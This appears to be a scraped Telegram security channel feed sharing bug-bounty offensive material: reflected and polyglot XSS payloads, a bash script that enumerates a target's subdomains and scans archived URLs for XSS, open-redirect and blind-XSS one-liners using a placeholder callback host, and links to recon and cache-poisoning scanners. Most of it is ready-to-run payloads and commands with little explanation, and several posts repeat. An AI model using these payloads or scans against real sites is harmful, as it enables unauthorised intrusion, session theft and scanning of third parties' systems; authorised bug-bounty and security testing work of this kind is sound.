This media is not supported in your browser
VIEW IN TELEGRAM
πDnsbruter- Dns Bruteforcing Toolπ
πIt is a powerful tool designed to perform active subdomain enumeration and discovery.
πLink https://github.com/sanjai-AK47/Dnsbruter/
πIt is a powerful tool designed to perform active subdomain enumeration and discovery.
πLink https://github.com/sanjai-AK47/Dnsbruter/
π₯7π3
πBug Bounty PoC'sπ
β https://drive.google.com/drive/folders/14zlqgin6rUfr6jQRBCLbbP8P8Vdypz7x
β https://drive.google.com/drive/folders/14zlqgin6rUfr6jQRBCLbbP8P8Vdypz7x
β€16π5π₯3
Top 3 RXSS payloads
`'";//><img/src=x onError="${x};alert(`1`);">
`'";//><Img Src=a OnError=location=src>
`'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>
β€6π₯3β€βπ₯1π1
Simple Reflected XSS
1. subfinder -d target .com | httprobe -c 100 > target.txt
2. cat target.txt | waybackurls | gf xss | kxxs
π₯°7π₯3
Brut Security
Simple Reflected XSS 1. subfinder -d target .com | httprobe -c 100 > target.txt 2. cat target.txt | waybackurls | gf xss | kxxs
For Automation Reflected XSS Scanning
#!/bin/bash
# Prompt user for domain input
read -p "Enter the domain you want to scan: " domain
# Define output file
output_file="scan_output.txt"
# Run subfinder to find subdomains, filter through httprobe, and save to target.txt
echo "Finding subdomains for $domain..."
subfinder -d $domain | httprobe -c 100 > target.txt
# Use waybackurls to find URLs from Wayback Machine, filter through gf for XSS, and scan with kxxs
echo "Scanning for XSS vulnerabilities..."
cat target.txt | waybackurls | gf xss | kxxs >> "$output_file"
# Display output file location
echo "Scan output saved to $output_file"
π₯6β€2
π¨Toxicacheπ¨
πGolang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
πhttps://lnkd.in/gdtpJGmT
πGolang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
πhttps://lnkd.in/gdtpJGmT
β‘5β€3π₯2π1π1
Awesome Bug Bounty One-liners
A collection of awesome one-liner scripts especially for bug bounty.
Open-redirect
Bash
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
Bash
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy https://127.0.0. .1:8080 -sk > /dev/null
XSS
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
Bash
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
π Repositories:
1. https://lnkd.in/dMBdxSQD
2. https://lnkd.in/ebTrAP8y
3. https://lnkd.in/dmG4G3ea
4. https://lnkd.in/dXxHMUu9
A collection of awesome one-liner scripts especially for bug bounty.
Open-redirect
Bash
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
Bash
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy https://127.0.0. .1:8080 -sk > /dev/null
XSS
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
Bash
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
π Repositories:
1. https://lnkd.in/dMBdxSQD
2. https://lnkd.in/ebTrAP8y
3. https://lnkd.in/dmG4G3ea
4. https://lnkd.in/dXxHMUu9
π10π₯5
Useful XSS payloads:
"/*\"/*`/*' /*</template> </textarea></noembed></noscript></title> </style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTIGJ5IFZpY2tpZScpPC9zY3JpcHQ+"
data:text/html,<script>alert(1)</script>
<select><noembed></select><script x='a@b'a>
β€11π4π1π₯1